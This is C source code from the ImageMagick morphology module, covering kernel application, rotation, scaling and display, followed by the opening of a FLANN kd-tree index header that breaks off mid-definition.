MagickOptionToMnemonic(MagickMorphologyOptions,method),(double)
method_loop,(double) stage_loop);
else if ( primitive != method )
(void) FormatMagickString(v_info, MaxTextExtent, "%s:%.20g -> ",
MagickOptionToMnemonic(MagickMorphologyOptions, method),(double)
method_loop);
else
v_info[0] = '\0';
}
/* Loop 4: Iterate the kernel with primitive */
kernel_loop = 0;
kernel_changed = 0;
changed = 1;
while ( kernel_loop < kernel_limit && changed > 0 ) {
kernel_loop++; /* the iteration of this kernel */
/* Create a clone as the destination image, if not yet defined */
if ( work_image == (Image *) NULL )
{
work_image=CloneImage(image,0,0,MagickTrue,exception);
if (work_image == (Image *) NULL)
goto error_cleanup;
if (SetImageStorageClass(work_image,DirectClass) == MagickFalse)
{
InheritException(exception,&work_image->exception);
goto error_cleanup;
}
/* work_image->type=image->type; ??? */
}
/* APPLY THE MORPHOLOGICAL PRIMITIVE (curr -> work) */
count++;
if ( method != DistanceMorphology )
changed = MorphologyPrimitive(curr_image, work_image, primitive,
channel, this_kernel, bias, exception);
else
changed = MorphologyPrimitiveDirect(work_image, primitive,
channel, this_kernel, exception);
if ( verbose == MagickTrue ) {
if ( kernel_loop > 1 )
fprintf(stderr, "\n"); /* add end-of-line from previous */
(void) fprintf(stderr, "%s%s%s:%.20g.%.20g #%.20g => Changed %.20g",
v_info,MagickOptionToMnemonic(MagickMorphologyOptions,
primitive),(this_kernel == rflt_kernel ) ? "*" : "",
(double) (method_loop+kernel_loop-1),(double) kernel_number,
(double) count,(double) changed);
}
if ( changed < 0 )
goto error_cleanup;
kernel_changed += changed;
method_changed += changed;
/* prepare next loop */
{ Image *tmp = work_image; /* swap images for iteration */
work_image = curr_image;
curr_image = tmp;
}
if ( work_image == image )
work_image = (Image *) NULL; /* replace input 'image' */
} /* End Loop 4: Iterate the kernel with primitive */
if ( verbose == MagickTrue && kernel_changed != (size_t)changed )
fprintf(stderr, " Total %.20g",(double) kernel_changed);
if ( verbose == MagickTrue && stage_loop < stage_limit )
fprintf(stderr, "\n"); /* add end-of-line before looping */
#if 0
fprintf(stderr, "--E-- image=0x%lx\n", (unsigned long)image);
fprintf(stderr, " curr =0x%lx\n", (unsigned long)curr_image);
fprintf(stderr, " work =0x%lx\n", (unsigned long)work_image);
fprintf(stderr, " save =0x%lx\n", (unsigned long)save_image);
fprintf(stderr, " union=0x%lx\n", (unsigned long)rslt_image);
#endif
} /* End Loop 3: Primitive (staging) Loop for Compound Methods */
/* Final Post-processing for some Compound Methods
**
** The removal of any 'Sync' channel flag in the Image Composition
** below ensures the mathematical compose method is applied in a
** purely mathematical way, and only to the selected channels.
** Turn off SVG composition 'alpha blending'.
*/
switch( method ) {
case EdgeOutMorphology:
case EdgeInMorphology:
case TopHatMorphology:
case BottomHatMorphology:
if ( verbose == MagickTrue )
fprintf(stderr, "\n%s: Difference with original image",
MagickOptionToMnemonic(MagickMorphologyOptions, method) );
(void) CompositeImageChannel(curr_image,
(ChannelType) (channel & ~SyncChannels),
DifferenceCompositeOp, image, 0, 0);
break;
case EdgeMorphology:
if ( verbose == MagickTrue )
fprintf(stderr, "\n%s: Difference of Dilate and Erode",
MagickOptionToMnemonic(MagickMorphologyOptions, method) );
(void) CompositeImageChannel(curr_image,
(ChannelType) (channel & ~SyncChannels),
DifferenceCompositeOp, save_image, 0, 0);
save_image = DestroyImage(save_image); /* finished with save image */
break;
default:
break;
}
/* multi-kernel handling: re-iterate, or compose results */
if ( kernel->next == (KernelInfo *) NULL )
rslt_image = curr_image; /* just return the resulting image */
else if ( rslt_compose == NoCompositeOp )
{ if ( verbose == MagickTrue ) {
if ( this_kernel->next != (KernelInfo *) NULL )
fprintf(stderr, " (re-iterate)");
else
fprintf(stderr, " (done)");
}
rslt_image = curr_image; /* return result, and re-iterate */
}
else if ( rslt_image == (Image *) NULL)
{ if ( verbose == MagickTrue )
fprintf(stderr, " (save for compose)");
rslt_image = curr_image;
curr_image = (Image *) image; /* continue with original image */
}
else
{ /* Add the new 'current' result to the composition
**
** The removal of any 'Sync' channel flag in the Image Composition
** below ensures the mathematical compose method is applied in a
** purely mathematical way, and only to the selected channels.
** IE: Turn off SVG composition 'alpha blending'.
*/
if ( verbose == MagickTrue )
fprintf(stderr, " (compose \"%s\")",
MagickOptionToMnemonic(MagickComposeOptions, rslt_compose) );
(void) CompositeImageChannel(rslt_image,
(ChannelType) (channel & ~SyncChannels), rslt_compose,
curr_image, 0, 0);
curr_image = DestroyImage(curr_image);
curr_image = (Image *) image; /* continue with original image */
}
if ( verbose == MagickTrue )
fprintf(stderr, "\n");
/* loop to the next kernel in a multi-kernel list */
norm_kernel = norm_kernel->next;
if ( rflt_kernel != (KernelInfo *) NULL )
rflt_kernel = rflt_kernel->next;
kernel_number++;
} /* End Loop 2: Loop over each kernel */
} /* End Loop 1: compound method iteration */
goto exit_cleanup;
/* Yes goto's are bad, but they make cleanup a lot more efficient */
error_cleanup:
if ( curr_image == rslt_image )
curr_image = (Image *) NULL;
if ( rslt_image != (Image *) NULL )
rslt_image = DestroyImage(rslt_image);
exit_cleanup:
if ( curr_image == rslt_image || curr_image == image )
curr_image = (Image *) NULL;
if ( curr_image != (Image *) NULL )
curr_image = DestroyImage(curr_image);
if ( work_image != (Image *) NULL )
work_image = DestroyImage(work_image);
if ( save_image != (Image *) NULL )
save_image = DestroyImage(save_image);
if ( reflected_kernel != (KernelInfo *) NULL )
reflected_kernel = DestroyKernelInfo(reflected_kernel);
return(rslt_image);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% M o r p h o l o g y I m a g e C h a n n e l %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% MorphologyImageChannel() applies a user supplied kernel to the image
% according to the given morphology method.
%
% This function applies any and all user defined settings before calling
% the above internal function MorphologyApply().
%
% User defined settings include...
% * Output Bias for Convolution and correlation ("-bias")
% * Kernel Scale/normalize settings ("-set 'option:convolve:scale'")
% This can also include the addition of a scaled unity kernel.
% * Show Kernel being applied ("-set option:showkernel 1")
%
% The format of the MorphologyImage method is:
%
% Image *MorphologyImage(const Image *image,MorphologyMethod method,
% const ssize_t iterations,KernelInfo *kernel,ExceptionInfo *exception)
%
% Image *MorphologyImageChannel(const Image *image, const ChannelType
% channel,MorphologyMethod method,const ssize_t iterations,
% KernelInfo *kernel,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o method: the morphology method to be applied.
%
% o iterations: apply the operation this many times (or until no change).
% A value of -1 means loop until no change found.
% How this is applied may depend on the morphology method.
% Typically this is a value of 1.
%
% o channel: the channel type.
%
% o kernel: An array of double representing the morphology kernel.
% Warning: kernel may be normalized for the Convolve method.
%
% o exception: return any errors or warnings in this structure.
%
*/
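/* Illustrative usage (a sketch, not part of this file; the kernel string
** and channel selection below are assumptions):
**
**   KernelInfo *kernel = AcquireKernelInfo("Octagon:3");
**   Image *dilated = MorphologyImageChannel(image, DefaultChannels,
**     DilateMorphology, 1, kernel, exception);
**   kernel = DestroyKernelInfo(kernel);
*/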
MagickExport Image *MorphologyImageChannel(const Image *image,
const ChannelType channel,const MorphologyMethod method,
const ssize_t iterations,const KernelInfo *kernel,ExceptionInfo *exception)
{
KernelInfo
*curr_kernel;
CompositeOperator
compose;
Image
*morphology_image;
/* Apply Convolve/Correlate Normalization and Scaling Factors.
* This is done BEFORE the ShowKernelInfo() function is called so that
* users can see the results of the 'option:convolve:scale' option.
*/
curr_kernel = (KernelInfo *) kernel;
if ( method == ConvolveMorphology || method == CorrelateMorphology )
{
const char
*artifact;
artifact = GetImageArtifact(image,"convolve:scale");
if ( artifact != (const char *)NULL ) {
if ( curr_kernel == kernel )
curr_kernel = CloneKernelInfo(kernel);
if (curr_kernel == (KernelInfo *) NULL) {
curr_kernel=DestroyKernelInfo(curr_kernel);
return((Image *) NULL);
}
ScaleGeometryKernelInfo(curr_kernel, artifact);
}
}
/* display the (normalized) kernel via stderr */
if ( IsMagickTrue(GetImageArtifact(image,"showkernel"))
|| IsMagickTrue(GetImageArtifact(image,"convolve:showkernel"))
|| IsMagickTrue(GetImageArtifact(image,"morphology:showkernel")) )
ShowKernelInfo(curr_kernel);
/* Override the default handling of multi-kernel morphology results
* If 'Undefined' use the default method
* If 'None' (default for 'Convolve') re-iterate previous result
* Otherwise merge resulting images using compose method given.
* Default for 'HitAndMiss' is 'Lighten'.
*/
{ const char
*artifact;
artifact = GetImageArtifact(image,"morphology:compose");
compose = UndefinedCompositeOp; /* use default for method */
if ( artifact != (const char *) NULL)
compose = (CompositeOperator) ParseMagickOption(
MagickComposeOptions,MagickFalse,artifact);
}
/* Apply the Morphology */
morphology_image = MorphologyApply(image, channel, method, iterations,
curr_kernel, compose, image->bias, exception);
/* Cleanup and Exit */
if ( curr_kernel != kernel )
curr_kernel=DestroyKernelInfo(curr_kernel);
return(morphology_image);
}
MagickExport Image *MorphologyImage(const Image *image, const MorphologyMethod
method, const ssize_t iterations,const KernelInfo *kernel, ExceptionInfo
*exception)
{
Image
*morphology_image;
morphology_image=MorphologyImageChannel(image,DefaultChannels,method,
iterations,kernel,exception);
return(morphology_image);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ R o t a t e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RotateKernelInfo() rotates the kernel by the angle given.
%
% Currently it is restricted to 90 degree angles, of either 1D kernels
% or square kernels. And 'circular' rotations of 45 degrees for 3x3 kernels.
% It will ignore useless rotations for specific 'named' built-in kernels.
%
% The format of the RotateKernelInfo method is:
%
% void RotateKernelInfo(KernelInfo *kernel, double angle)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o angle: angle to rotate in degrees
%
% This function is currently internal to this module only, but can be exported
% to other modules if needed.
*/
static void RotateKernelInfo(KernelInfo *kernel, double angle)
{
/* angle the lower kernels first */
if ( kernel->next != (KernelInfo *) NULL)
RotateKernelInfo(kernel->next, angle);
/* WARNING: Currently assumes the kernel (rightly) is horizontally symmetrical
**
** TODO: expand beyond simple 90 degree rotates, flips and flops
*/
/* Modulus the angle */
angle = fmod(angle, 360.0);
if ( angle < 0 )
angle += 360.0;
if ( 337.5 < angle || angle <= 22.5 )
return; /* Near zero angle - no change! - At least not at this time */
/* Handle special cases */
switch (kernel->type) {
/* These built-in kernels are cylindrical kernels, rotating is useless */
case GaussianKernel:
case DoGKernel:
case LoGKernel:
case DiskKernel:
case PeaksKernel:
case LaplacianKernel:
case ChebyshevKernel:
case ManhattanKernel:
case EuclideanKernel:
return;
/* These may be rotatable at non-90 angles in the future */
/* but simply rotating them in multiples of 90 degrees is useless */
case SquareKernel:
case DiamondKernel:
case PlusKernel:
case CrossKernel:
return;
/* These only allow a +/-90 degree rotation (by transpose) */
/* A 180 degree rotation is useless */
case BlurKernel:
case RectangleKernel:
if ( 135.0 < angle && angle <= 225.0 )
return;
if ( 225.0 < angle && angle <= 315.0 )
angle -= 180;
break;
default:
break;
}
/* Attempt rotations by 45 degrees */
if ( 22.5 < fmod(angle,90.0) && fmod(angle,90.0) <= 67.5 )
{
if ( kernel->width == 3 && kernel->height == 3 )
{ /* Rotate a 3x3 square by 45 degree angle */
MagickRealType t = kernel->values[0];
kernel->values[0] = kernel->values[3];
kernel->values[3] = kernel->values[6];
kernel->values[6] = kernel->values[7];
kernel->values[7] = kernel->values[8];
kernel->values[8] = kernel->values[5];
kernel->values[5] = kernel->values[2];
kernel->values[2] = kernel->values[1];
kernel->values[1] = t;
/* rotate non-centered origin */
if ( kernel->x != 1 || kernel->y != 1 ) {
ssize_t x,y;
x = (ssize_t) kernel->x-1;
y = (ssize_t) kernel->y-1;
if ( x == y ) x = 0;
else if ( x == 0 ) x = -y;
else if ( x == -y ) y = 0;
else if ( y == 0 ) y = x;
kernel->x = (ssize_t) x+1;
kernel->y = (ssize_t) y+1;
}
angle = fmod(angle+315.0, 360.0); /* angle reduced 45 degrees */
kernel->angle = fmod(kernel->angle+45.0, 360.0);
}
else
perror("Unable to rotate non-3x3 kernel by 45 degrees");
}
if ( 45.0 < fmod(angle, 180.0) && fmod(angle,180.0) <= 135.0 )
{
if ( kernel->width == 1 || kernel->height == 1 )
{ /* Do a transpose of a one-dimensional kernel,
** which results in a fast 90 degree rotation of some type.
*/
ssize_t
t;
t = (ssize_t) kernel->width;
kernel->width = kernel->height;
kernel->height = (size_t) t;
t = kernel->x;
kernel->x = kernel->y;
kernel->y = t;
if ( kernel->width == 1 ) {
angle = fmod(angle+270.0, 360.0); /* angle reduced 90 degrees */
kernel->angle = fmod(kernel->angle+90.0, 360.0);
} else {
angle = fmod(angle+90.0, 360.0); /* angle increased 90 degrees */
kernel->angle = fmod(kernel->angle+270.0, 360.0);
}
}
else if ( kernel->width == kernel->height )
{ /* Rotate a square array of values by 90 degrees */
{ register size_t
i,j,x,y;
register MagickRealType
*k,t;
k=kernel->values;
for( i=0, x=kernel->width-1; i<=x; i++, x--)
for( j=0, y=kernel->height-1; j<y; j++, y--)
{ t = k[i+j*kernel->width];
k[i+j*kernel->width] = k[j+x*kernel->width];
k[j+x*kernel->width] = k[x+y*kernel->width];
k[x+y*kernel->width] = k[y+i*kernel->width];
k[y+i*kernel->width] = t;
}
}
/* rotate the origin - relative to center of array */
{ register ssize_t x,y;
x = (ssize_t) (kernel->x*2-kernel->width+1);
y = (ssize_t) (kernel->y*2-kernel->height+1);
kernel->x = (ssize_t) ( -y +(ssize_t) kernel->width-1)/2;
kernel->y = (ssize_t) ( +x +(ssize_t) kernel->height-1)/2;
}
angle = fmod(angle+270.0, 360.0); /* angle reduced 90 degrees */
kernel->angle = fmod(kernel->angle+90.0, 360.0);
}
else
perror("Unable to rotate a non-square, non-linear kernel 90 degrees");
}
if ( 135.0 < angle && angle <= 225.0 )
{
/* For a 180 degree rotation - also known as a reflection
* This is actually a very common operation!
* Basically all that is needed is a reversal of the kernel data!
* And a reflection of the origin
*/
size_t
i,j;
register double
*k,t;
k=kernel->values;
for ( i=0, j=kernel->width*kernel->height-1; i<j; i++, j--)
t=k[i], k[i]=k[j], k[j]=t;
kernel->x = (ssize_t) kernel->width - kernel->x - 1;
kernel->y = (ssize_t) kernel->height - kernel->y - 1;
angle = fmod(angle-180.0, 360.0); /* angle reduced 180 degrees */
kernel->angle = fmod(kernel->angle+180.0, 360.0);
}
/* At this point the angle should be between -45 (315) and +45 degrees.
* In the future some form of non-orthogonal angled rotates could be
* performed here, possibly with a linear kernel restriction.
*/
return;
}
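/* Illustrative example (a sketch): for a 1x5 linear kernel, a call such as
** RotateKernelInfo(kernel, 90.0) takes the transpose path above, swapping
** width and height (1x5 -> 5x1) and the x/y origin, then recording the 90
** degree change in kernel->angle.
*/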
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S c a l e G e o m e t r y K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ScaleGeometryKernelInfo() takes a geometry argument string, typically
% provided as a "-set option:convolve:scale {geometry}" user setting,
% and modifies the kernel according to the parsed arguments of that setting.
%
% The first argument (and any normalization flags) are passed to
% ScaleKernelInfo() to scale/normalize the kernel. The second argument
% is then passed to UnityAddKernelInfo() to add a scaled unity kernel
% into the scaled/normalized kernel.
%
% The format of the ScaleGeometryKernelInfo method is:
%
% void ScaleGeometryKernelInfo(KernelInfo *kernel,
% const char *geometry)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to modify
%
% o geometry:
% The geometry string to parse, typically from the user provided
% "-set option:convolve:scale {geometry}" setting.
%
*/
MagickExport void ScaleGeometryKernelInfo (KernelInfo *kernel,
const char *geometry)
{
GeometryFlags
flags;
GeometryInfo
args;
SetGeometryInfo(&args);
flags = (GeometryFlags) ParseGeometry(geometry, &args);
#if 0
/* For Debugging Geometry Input */
fprintf(stderr, "Geometry = 0x%04X : %lg x %lg %+lg %+lg\n",
flags, args.rho, args.sigma, args.xi, args.psi );
#endif
if ( (flags & PercentValue) != 0 ) /* Handle Percentage flag*/
args.rho *= 0.01, args.sigma *= 0.01;
if ( (flags & RhoValue) == 0 ) /* Set Defaults for missing args */
args.rho = 1.0;
if ( (flags & SigmaValue) == 0 )
args.sigma = 0.0;
/* Scale/Normalize the input kernel */
ScaleKernelInfo(kernel, args.rho, flags);
/* Add Unity Kernel, for blending with original */
if ( (flags & SigmaValue) != 0 )
UnityAddKernelInfo(kernel, args.sigma);
return;
}
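/* Illustrative geometry arguments (assumed strings; flag meanings per the
** NOTE in ScaleKernelInfo below):
**
**   ScaleGeometryKernelInfo(kernel, "2");         scale all values by 2
**   ScaleGeometryKernelInfo(kernel, "50%!");      normalize, then halve
**   ScaleGeometryKernelInfo(kernel, "100%,100%"); also add a unity kernel
*/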
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S c a l e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ScaleKernelInfo() scales the given kernel list by the given amount, with or
% without normalization of the sum of the kernel values (as per given flags).
%
% By default (no flags given) the values within the kernel are scaled
% directly using the given scaling factor without change.
%
% If either of the two 'normalize_flags' are given the kernel will first be
% normalized and then further scaled by the scaling factor value given.
%
% Kernel normalization ('normalize_flags' given) is designed to ensure that
% any use of the kernel scaling factor with 'Convolve' or 'Correlate'
% morphology methods will fall into the -1.0 to +1.0 range. Note that for
% non-HDRI versions of IM this may cause images to have any negative results
% clipped, unless some 'bias' is used.
%
% More specifically, kernels which only contain positive values (such as a
% 'Gaussian' kernel) will be scaled so that those values sum to +1.0,
% ensuring a 0.0 to +1.0 output range for non-HDRI images.
%
% For kernels that contain some negative values (such as 'Sharpen' kernels),
% the kernel will be scaled by the absolute value of the sum of kernel
% values, so that it will generally fall within the +/- 1.0 range.
%
% For kernels whose values sum to zero (such as 'Laplacian' kernels), the
% kernel will be scaled by just the sum of the positive values, so that its
% output range will again fall into the +/- 1.0 range.
%
% For special kernels designed for locating shapes using 'Correlate', (often
% only containing +1 and -1 values, representing foreground/background
% matching) a special normalization method is provided to scale the positive
% values separately to those of the negative values, so the kernel will be
% forced to become a zero-sum kernel better suited to such searches.
%
% WARNING: Correct normalization of the kernel assumes that the '*_range'
% attributes within the kernel structure have been correctly set during the
% kernel's creation.
%
% NOTE: The values used for 'normalize_flags' have been selected specifically
% to match the use of geometry options, so that '!' means NormalizeValue, '^'
% means CorrelateNormalizeValue. All other GeometryFlags values are ignored.
%
% The format of the ScaleKernelInfo method is:
%
% void ScaleKernelInfo(KernelInfo *kernel, const double scaling_factor,
% const MagickStatusType normalize_flags )
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o scaling_factor:
% multiply all values (after normalization) by this factor if not
% zero. If normalize flags are given, the kernel is normalized first,
% then scaled.
%
% o normalize_flags:
% GeometryFlags defining normalization method to use.
% specifically: NormalizeValue, CorrelateNormalizeValue,
% and/or PercentValue
%
*/
MagickExport void ScaleKernelInfo(KernelInfo *kernel,
const double scaling_factor,const GeometryFlags normalize_flags)
{
register ssize_t
i;
register double
pos_scale,
neg_scale;
/* do the other kernels in a multi-kernel list first */
if ( kernel->next != (KernelInfo *) NULL)
ScaleKernelInfo(kernel->next, scaling_factor, normalize_flags);
/* Normalization of Kernel */
pos_scale = 1.0;
if ( (normalize_flags&NormalizeValue) != 0 ) {
if ( fabs(kernel->positive_range + kernel->negative_range) > MagickEpsilon )
/* non-zero-summing kernel (generally positive) */
pos_scale = fabs(kernel->positive_range + kernel->negative_range);
else
/* zero-summing kernel */
pos_scale = kernel->positive_range;
}
/* Force kernel into a normalized zero-summing kernel */
if ( (normalize_flags&CorrelateNormalizeValue) != 0 ) {
pos_scale = ( fabs(kernel->positive_range) > MagickEpsilon )
? kernel->positive_range : 1.0;
neg_scale = ( fabs(kernel->negative_range) > MagickEpsilon )
? -kernel->negative_range : 1.0;
}
else
neg_scale = pos_scale;
/* finalize scaling_factor for positive and negative components */
pos_scale = scaling_factor/pos_scale;
neg_scale = scaling_factor/neg_scale;
for (i=0; i < (ssize_t) (kernel->width*kernel->height); i++)
if ( ! IsNan(kernel->values[i]) )
kernel->values[i] *= (kernel->values[i] >= 0) ? pos_scale : neg_scale;
/* convolution output range */
kernel->positive_range *= pos_scale;
kernel->negative_range *= neg_scale;
/* maximum and minimum values in kernel */
kernel->maximum *= (kernel->maximum >= 0.0) ? pos_scale : neg_scale;
kernel->minimum *= (kernel->minimum >= 0.0) ? pos_scale : neg_scale;
/* swap kernel settings if user's scaling factor is negative */
if ( scaling_factor < MagickEpsilon ) {
double t;
t = kernel->positive_range;
kernel->positive_range = kernel->negative_range;
kernel->negative_range = t;
t = kernel->maximum;
kernel->maximum = kernel->minimum;
kernel->minimum = t;
}
return;
}
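/* Illustrative calls (a sketch; NoValue is the empty GeometryFlags value):
**
**   ScaleKernelInfo(kernel, 2.0, NoValue);         double every value
**   ScaleKernelInfo(kernel, 1.0, NormalizeValue);  normalize kernel sum
*/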
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S h o w K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ShowKernelInfo() outputs the details of the given kernel definition to
% standard error, generally due to a user's 'showkernel' option request.
%
% The format of the ShowKernel method is:
%
% void ShowKernelInfo(KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
*/
MagickExport void ShowKernelInfo(KernelInfo *kernel)
{
KernelInfo
*k;
size_t
c, i, u, v;
for (c=0, k=kernel; k != (KernelInfo *) NULL; c++, k=k->next ) {
fprintf(stderr, "Kernel");
if ( kernel->next != (KernelInfo *) NULL )
fprintf(stderr, " #%lu", (unsigned long) c );
fprintf(stderr, " \"%s",
MagickOptionToMnemonic(MagickKernelOptions, k->type) );
if ( fabs(k->angle) > MagickEpsilon )
fprintf(stderr, "@%lg", k->angle);
fprintf(stderr, "\" of size %lux%lu%+ld%+ld",(unsigned long) k->width,
(unsigned long) k->height,(long) k->x,(long) k->y);
fprintf(stderr,
" with values from %.*lg to %.*lg\n",
GetMagickPrecision(), k->minimum,
GetMagickPrecision(), k->maximum);
fprintf(stderr, "Forming a output range from %.*lg to %.*lg",
GetMagickPrecision(), k->negative_range,
GetMagickPrecision(), k->positive_range);
if ( fabs(k->positive_range+k->negative_range) < MagickEpsilon )
fprintf(stderr, " (Zero-Summing)\n");
else if ( fabs(k->positive_range+k->negative_range-1.0) < MagickEpsilon )
fprintf(stderr, " (Normalized)\n");
else
fprintf(stderr, " (Sum %.*lg)\n",
GetMagickPrecision(), k->positive_range+k->negative_range);
for (i=v=0; v < k->height; v++) {
fprintf(stderr, "%2lu:", (unsigned long) v );
for (u=0; u < k->width; u++, i++)
if ( IsNan(k->values[i]) )
fprintf(stderr," %*s", GetMagickPrecision()+3, "nan");
else
fprintf(stderr," %*.*lg", GetMagickPrecision()+3,
GetMagickPrecision(), k->values[i]);
fprintf(stderr,"\n");
}
}
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% U n i t y A d d K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% UnityAddKernelInfo() Adds a given amount of the 'Unity' Convolution Kernel
% to the given pre-scaled and normalized Kernel. This in effect adds that
% amount of the original image into the resulting convolution kernel. This
% value is usually provided by the user as a percentage value in the
% 'convolve:scale' setting.
%
% The resulting effect is to convert the defined kernels into blended
% soft-blurs, unsharp kernels or into sharpening kernels.
%
% The format of the UnityAddKernelInfo method is:
%
% void UnityAddKernelInfo(KernelInfo *kernel, const double scale )
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o scale:
% scaling factor for the unity kernel to be added to
% the given kernel.
%
*/
MagickExport void UnityAddKernelInfo(KernelInfo *kernel,
const double scale)
{
/* do the other kernels in a multi-kernel list first */
if ( kernel->next != (KernelInfo *) NULL)
UnityAddKernelInfo(kernel->next, scale);
/* Add the scaled unity kernel to the existing kernel */
kernel->values[kernel->x+kernel->y*kernel->width] += scale;
CalcKernelMetaData(kernel); /* recalculate the meta-data */
return;
}
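/* Worked example (a sketch): for a normalized 3x3 averaging kernel (all
** values 1/9) and scale=1.0, the origin value becomes 1/9 + 1.0, so the
** convolution output blends the full original image with its smoothed
** version - the basis of the unsharp/sharpening kernels mentioned above.
*/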
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% Z e r o K e r n e l N a n s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ZeroKernelNans() replaces any special 'nan' value that may be present in
% the kernel with a zero value. This is typically done when the kernel will
% be used in special hardware (GPU) convolution processors, to simplify
% matters.
%
% The format of the ZeroKernelNans method is:
%
% void ZeroKernelNans (KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
*/
MagickExport void ZeroKernelNans(KernelInfo *kernel)
{
register size_t
i;
/* do the other kernels in a multi-kernel list first */
if ( kernel->next != (KernelInfo *) NULL)
ZeroKernelNans(kernel->next);
for (i=0; i < (kernel->width*kernel->height); i++)
if ( IsNan(kernel->values[i]) )
kernel->values[i] = 0.0;
return;
}
|
kdtree_index.h | /***********************************************************************
* Software License Agreement (BSD License)
*
* Copyright 2008-2009 Marius Muja (mariusm@cs.ubc.ca). All rights reserved.
* Copyright 2008-2009 David G. Lowe (lowe@cs.ubc.ca). All rights reserved.
*
* THE BSD LICENSE
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*************************************************************************/
#ifndef RTABMAP_FLANN_KDTREE_INDEX_H_
#define RTABMAP_FLANN_KDTREE_INDEX_H_
#include <algorithm>
#include <map>
#include <cassert>
#include <cstring>
#include <stdarg.h>
#include <cmath>
#include "rtflann/general.h"
#include "rtflann/algorithms/nn_index.h"
#include "rtflann/util/dynamic_bitset.h"
#include "rtflann/util/matrix.h"
#include "rtflann/util/result_set.h"
#include "rtflann/util/heap.h"
#include "rtflann/util/allocator.h"
#include "rtflann/util/random.h"
#include "rtflann/util/saving.h"
namespace rtflann
{
struct KDTreeIndexParams : public IndexParams
{
KDTreeIndexParams(int trees = 4)
{
(*this)["algorithm"] = FLANN_INDEX_KDTREE;
(*this)["trees"] = trees;
}
};
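// Illustrative usage (a sketch; assumes a populated rtflann::Matrix<float>
// named "dataset" and the rtflann L2 distance functor):
//
//   KDTreeIndex<L2<float> > index(dataset, KDTreeIndexParams(8));
//   index.buildIndex();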
/**
* Randomized kd-tree index
*
* Contains the k-d trees and other information for indexing a set of points
* for nearest-neighbor matching.
*/
template <typename Distance>
class KDTreeIndex : public NNIndex<Distance>
{
public:
typedef typename Distance::ElementType ElementType;
typedef typename Distance::ResultType DistanceType;
typedef NNIndex<Distance> BaseClass;
typedef bool needs_kdtree_distance;
private:
/*--------------------- Internal Data Structures --------------------------*/
struct Node
{
/**
* Dimension used for subdivision.
*/
int divfeat;
/**
